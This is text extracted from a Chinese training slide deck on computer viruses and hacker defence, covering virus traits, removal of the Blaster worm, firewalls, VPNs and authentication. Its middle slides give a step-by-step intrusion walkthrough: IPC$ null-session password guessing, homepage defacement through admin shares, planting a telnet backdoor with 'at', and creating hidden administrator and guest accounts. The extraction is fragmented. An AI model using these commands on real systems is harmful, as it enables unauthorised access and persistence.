计算机病毒和黑客防范培训课件.ppt

,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,计算机病毒和黑客防范,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,计算机病毒和黑客防范,*,计算机病毒和黑客防范,第,9,章、计算机病毒与黑客防范,9.1,计算机病毒解析,1,、计算机病毒的来源：,一方面计算机用处很大，另一方面计算机也存在很多可攻击的地方即安全漏洞，所以出现了计算机病毒。,2,、计算机病毒:指能够通过自身复制进行传染，进而起破坏作用的一种计算机程序。,这类程序的主要特征如下：,程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。,3,、计算机病毒的分类：,引导性病毒、文件性病毒、网络型病毒,2,计算机病毒和黑客防范,9.2,计算机病毒,4,、病毒程序模型：包括三个部分，即安装模块、感染模块和破坏模块。,5,、计算机病毒的规律和现象。,内存少了,1KB,。一般病毒程序在内存中占用高端,1K,的空,间。该空间,DOS,操作系统管不了，病毒修改内存空间大,小标记单位,0413,单元中的内容，造成,DOS,操作系统就,认为机器是少,1KB,内存空间大小。,引导扇区被抢占。硬盘包括主引导扇区和,DOS,引导扇区,软盘只有,DOS,引导扇区。,文件被加长，文件性病毒寄生在可执行文件上，如,COM,或,EXE,文件。,启动程序被修改。,3,计算机病毒和黑客防范,9.3,计算机病毒的防范,1,、使用,OFFICESCAN,软件杀毒,2,、使用江民杀毒王杀毒,3,、使用瑞星杀毒软件清除病毒。,4,、清除冲击波病毒实例。,冲击波病毒是在,2003,年,8,月席卷全球计算机网络的一种计算机病毒当时几乎造成,60%,的计算机处于瘫痪。,该病毒的特点如下：,病毒名称：,Worm.Blaser,发作时间：随机,病毒类型：蠕虫病毒 传播途径：网络,/RPC,漏洞,依赖系统：,Windows2000/XP,病毒尺寸：,6176,字节,发作现象：冲击疲病毒是利用微软公司在,2003,年,7,月,21,日公布的,RPC,漏洞进行传播，有,RPC,服务且没有打安全补丁的计算机都有,4,计算机病毒和黑客防范,9.4、,清除冲击波病毒实例,漏洞，涉及,WIN2000,、,XP,、,Server2003,。计算机感染该病毒后，系统资源被耗尽，有时会弹出,RPC,服务终止对话框、反复得启动、不能收发邮件、不能正常复制和粘贴文件，无法正常浏览网页，,DNS,和,IIS,服务遭到非法拒绝等。,冲击波病毒的清除,1,、,DOS,环境下清除,用,DOS,系统盘启动，再进入,Windows,目录下查找,msblast.exe,删除。,2,、安全模式下清除,f,启动,Windows,进入安全模式，搜索,C,盘，查找,msblast.exe,文件，删除。,5,计算机病毒和黑客防范,9.5、,清除冲击波病毒实例,3,、给系统打补丁，进入微软网站下载系统补丁,Windows2000,下载地址,:,软件破解、获得服务,上的,shadow,密码文件再破解。,2,、特洛伊木马术，常用的木马软件有网络公牛（,Netbull),、网络神偷（,netthief),、,WAY2.4(,火凤凰,无赖小子,),广外女生,聪明基因，,netspy,（网络精灵），木马往往躲藏在,windows,的系统目录下，伪装成一个文本文件和网页文件，通过端口与外界联系。或者改变文件关联方式达到自启动。从而泄漏信息。,3,、监听术：拦截网络接口获取密码如,sniffer,软件。,7,计算机病毒和黑客防范,9.8、,网络入侵实例解析,1,、从因特网上下载流光,(Fluxay)V4.71 FOR WinNT/2000/XP,。操作演示：,如何探测电子邮件：电子邮件系统一般建立在网络服,务器上，,如电子邮件地址,xxx,表示该电子邮件存储在,网站上,其域名为,P,探测,打开软件,-,选,pop3,主机,右击在弹出式菜单中选择“编辑”，然后“添加”,-,使用字典：在主画面中选择,pop3,主机,-,右击,-,编辑,-,从列表中添加,-,一个字典文件。,探测,-,选择,pop3,主机，右击,-,探测用户信息,9,计算机病毒和黑客防范,9.9、,网络入侵实例解析,利用,IPC,进行探测：,IPC$,是共享“命名管道”的资源，它对于程序间的通信很重要，在远程管理计算机和查看计算机的共享资源时使用。利用,IPC$,可以与目标主机建立一个空的连接（无需用户名和密码），而利用这个空连接就可以得到目标主机上的用户列表，并配合字典进行密码尝试。,例探测,207.188.221.1-207.188.222.255,确定探测地址：选探测,-,选择扫描,pop3/ftp/nt/sql,主机在主机扫描范围输入,207.188.221.1-207.188.222.255,类型选择“,NT/98”,选择,IPC$,主机,-,右击,-,检测主机类型看结果。,扫描到开放的主机后，在,Windows2k,的,cmd.exe,下键入,Net use,IP,地址,IPC$“,密码“,/user:“,用户名”,10,计算机病毒和黑客防范,9.10、,网络入侵实例解析,连接成功后，可以更换对方,Web,主页,键入如下：,Copy c:index.htm,IP,地址,C$inetpubwwwroot,其中,C$inetpubwwwroot,是对方主机主页目录。,留后门，如果想在以后登录该服务器，可以设置,telnet,服务，操作步骤如下：,上传,srv.exe,程序，将流光目录,tool,文件下的,srv.exe,复制到,C,盘,将,srv.exe,复制到对方服务器,system32,目录,Copy c:srv.exe,IP,地址,admin$,11,计算机病毒和黑客防范,9.11,网络入侵实例解析,获取进程，键入如下命令：,Net time,IP,地址,得到时间，记住这个时间，在稍后的,时间启动,srv.exe,键入,At,ip,地址,启动,telnet,的时间,srv.exe,这时用,srv.exe,打开的默认端口是,99,，完成种木马。,再次登录，键入如下命令,telnet IP,地址,99,就可再访问该服务器，直接到对方服务器的,c:winntsystem32,目录下，这是黑客入侵的全过程,12,计算机病毒和黑客防范,9.12、,网络入侵的常用命令,Net,命令,1,、假设对方的,IP,地址是,127.0.0.1,获取的用户名是,abc,，,密码是,123456,，利用,IPC$,连接、登录、退出。,IPC$,是一种共享空连接。,连接并登录,Net use,127.0.0.1ipc$,“123456”/user:“abc”,退出,Net use,127.0.0.1ipc$,/delte,利用,SA,用户增加用户，用户名,bcd,，密码,123456,一般,SA,用户相当系统的超级用户。创建用户：,Net use bcd 123456 /add,加入,administrator,组：,Net localgroup administrator bcd /add,设置,guset,默认用户。,13,计算机病毒和黑客防范,9.13,网络入侵的常用命令,Guest,是,NT,默认用户，无法删除。可激活它并加上密码,激活,guest,用户,:,Net user guest/active:yes,增加密码：,Net user guest 123456,一旦这样做后，就可以使用,guest,用户自由登录，并且不被发现。,AT,命令,:,此命令的功能是在特定的日期和时间运行某些命令和程序,.,种木马,假设已经登录了对方主机,键入如下命令,:,Net time,127.0.0.1,这时系统返回一个时间,如,12:1,同时得到新的作业,ID=1,14,计算机病毒和黑客防范,9.14,网络入侵的常用命令,启动一个程序,键入,at,127.0.0.1,12:3 nc.exe,在,12:3,时间执行,nc.exe,程序,执行该程序,对方,99,端口就开放,这就在对方机器上种下一个木马,.,telnet,：远程登录命令，在正常情况下需要用户名和密码，如果利用种下的木马，可以真接打开端口。如,telnet 127.0.0.1 99,FTP,：是文件传输命令,例 设,FTP,服务器为,用户名为,abc,，密码为,123,用,FTP,命令实现文件双向传输。,登录：,ftp,将本机,c:index.htm,文件传送到对方,d:,下,Put c:index.htm d:,将对方,d:index.htm,文件传送到本机,c:,下,Get d:index.htm c:,15,计算机病毒和黑客防范,9.15,网络入侵的常用命令,Net star:,显示网络连接、路由表和网络接口信息，可以让用户得知目前有哪些网络连接正在运作。,在本机上使用,netstar,命令。,$netstar,16,计算机病毒和黑客防范,9.16,黑客防范技术,1,、基本防范方法,将磁盘分区转换为,NTFS,格式。,远程访问（,RAS,）防范,访问单一服务器：限定所有远程用户访问单一服务器,使用其他协议：,RAS,服务器一般都使用,TCP/IP,协议，而,TCP/IP,协议比较容易受攻击，改为,IPX/SPX,和,netbeui.,用户地址绑定，将用户名、密码、网卡和计算机名绑定。,及时更新安全漏洞补救程序。,2,、防火墙技术,防火墙是一种用来加强网络之间访问控制的特殊网络互联设备。放在内网和外网之间，根本任务是阻止外网用户非法入侵，但不能阻止外网和内网之间的正常通信。,17,计算机病毒和黑客防范,9.17,黑客防范技术,1,、通常使用的安全控制手段有,包过滤、,状态检测,代理服务。,代理服务是运行于内部网络和外部网络之间的主机之上的一种应用。当用户需要访问代理服务器另一侧的主机时，对符合安全规则的连接，代理服务器会代替主机响应，并重新各主机发出一个相同的请求，当此连接请求得到回应度建立起连接之后，内部主机同外部主机之间的通信将通过代理程序映射相应边接实现。,18,计算机病毒和黑客防范,9.18,黑客防范技术,2,、防火墙产品：分为硬件防火墙和软件防火墙,华堂防火墙：一种智能过滤型软硬件一体化防御系统,网络卫士防火墙,瑞星软件防火墙：提供网络实时过滤监控功能，可防御各种木马的恶意攻击（如,BO,、冰河）冲击波病毒主要是通过,TCP,的,135,、,4444,端口和,UDP,的,99,端口进行攻击。,19,计算机病毒和黑客防范,9.19,黑客防范技术,3,、瑞星防火墙设置举例：,下载瑞星防火墙软件演示：,4,、网络入侵检测：是对防火墙的合理补充，帮助系统对网络攻击，扩展了系统管理员的安全管理能力，从网络中若干关键点收集信息，看网络中是否有违安全策略的行为和遭到袭击的迹象。是典型的防黑客攻击技术，代表产品有华依网络入侵检测系统。,20,计算机病毒和黑客防范,9.20 VPN,虚拟专用网,1、,VPN,虚拟专用网组建,2、,VPN,示意图,21,计算机病毒和黑客防范,9.21,网络安全体系结构,网络安全体系结构：从层次上讲包括网络级安全、应用级安全、系统级安全和管理安全。,解决网络安全常用手段：,防病毒软件,防火墙,入侵检测,虚拟网络（,VLAN,）指根据交换机端口（指静态虚拟局域网,),或,MAC,地址,(,动态虚拟局域网,),将主机和相关客户机划分为一组,形成虚拟局域网,.,。,虚拟专用网（,VPN,）：是企业网在因特网上的延伸。通过一个专有通道在公共网络上创建一个安全的专的连接。,加密技术：加密网络不依赖于网络传输途径，是通过对数据本身的加密来保障网络安全性,22,计算机病毒和黑客防范,9.22,网络安全体系结构,认证技术：解决网络通信过程中通信双方的身份认可。,常用认证方法,User/,assword,认证：常用于操作系统登录,telnet,，此认证方式不加密，容易被监听和解密。,使用摘要算法认证：,adius,（拔号认证协议）,OSPf,（路由协议）,ecurity protocol,等均使用共享的,Security Key,加上摘要算法,基于认证：使用公开密钥体系进行认证和加密，安全性很高。,应用在电子邮件、应用服务器访问、客户认证、防火墙认证，涉及到繁重的证书管理任务。,数字签名：可验证发送者身份和消息完整性。消息随数字签名一同发送，对消息的任何修改要验证数字签名时都被发现，伪造数字签名从计算机能力上讲是不可行的。,23,计算机病毒和黑客防范,